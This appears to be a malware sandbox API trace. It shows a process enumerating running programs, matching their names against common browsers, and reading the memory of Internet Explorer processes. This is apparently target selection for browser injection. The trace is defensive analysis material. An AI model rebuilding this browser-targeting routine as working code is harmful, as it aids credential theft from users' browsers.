	[0246.222] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0246.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9500
	[0246.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.223] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0246.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.224] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.224] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0246.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.225] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.225] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0246.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9504
	[0246.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.226] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0246.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.227] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.227] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0246.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.227] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.227] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0246.228] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9508
	[0246.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.228] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0246.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.229] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.229] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0246.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.229] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.229] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0246.230] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x950c
	[0246.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.230] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0246.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.231] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.232] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0246.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.232] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.232] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0246.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9510
	[0246.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.233] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0246.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.234] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.235] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0246.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.235] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.236] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0246.236] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9514
	[0246.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.236] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0246.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.237] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.237] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0246.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.237] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.237] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0246.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9518
	[0246.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.238] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0246.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.239] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.239] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0246.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.240] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.240] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0246.241] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x951c
	[0246.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.241] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0246.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.241] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.242] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0246.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.242] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0246.243] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9520
	[0246.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.244] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0246.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.244] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.244] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0246.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.244] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.245] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0246.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9524
	[0246.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.246] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0246.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.246] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.246] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0246.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.248] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.248] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0246.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9528
	[0246.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.249] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0246.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.250] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.250] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0246.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.251] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.251] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0246.252] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x952c
	[0246.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.252] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0246.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.252] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.253] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0246.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.254] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.254] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0246.255] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9530
	[0246.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.255] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0246.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.255] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.256] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0246.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.256] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.257] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0246.257] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9534
	[0246.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.258] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0246.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.258] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.259] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0246.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.259] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.260] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0246.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9538
	[0246.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.261] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0246.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.261] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.262] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0246.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.263] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.263] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0246.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x953c
	[0246.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.264] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0246.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.265] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0246.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.265] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0246.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.265] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.266] NtQueryInformationProcess (in: ProcessHandle=0x953c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0246.266] ReadProcessMemory (in: hProcess=0x953c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0246.266] ReadProcessMemory (in: hProcess=0x953c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0246.266] ReadProcessMemory (in: hProcess=0x953c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0246.266] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0246.266] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0246.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9540
	[0246.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.267] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0246.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.267] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0246.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.268] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0246.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.268] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.268] NtQueryInformationProcess (in: ProcessHandle=0x9540, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0246.268] ReadProcessMemory (in: hProcess=0x9540, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0246.268] ReadProcessMemory (in: hProcess=0x9540, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0246.268] ReadProcessMemory (in: hProcess=0x9540, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0246.269] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0246.269] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0246.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9544
	[0246.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.270] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0246.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.270] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.270] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0246.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.271] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.271] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0246.272] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9548
	[0246.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.272] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0246.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.272] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.273] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0246.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.273] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.273] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.274] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x954c
	[0246.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.274] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.274] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.275] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.275] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.275] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.276] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9550
	[0246.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.277] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.277] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.277] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.278] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9554
	[0246.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.280] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.280] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.280] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.281] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.281] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0246.282] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9558
	[0246.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
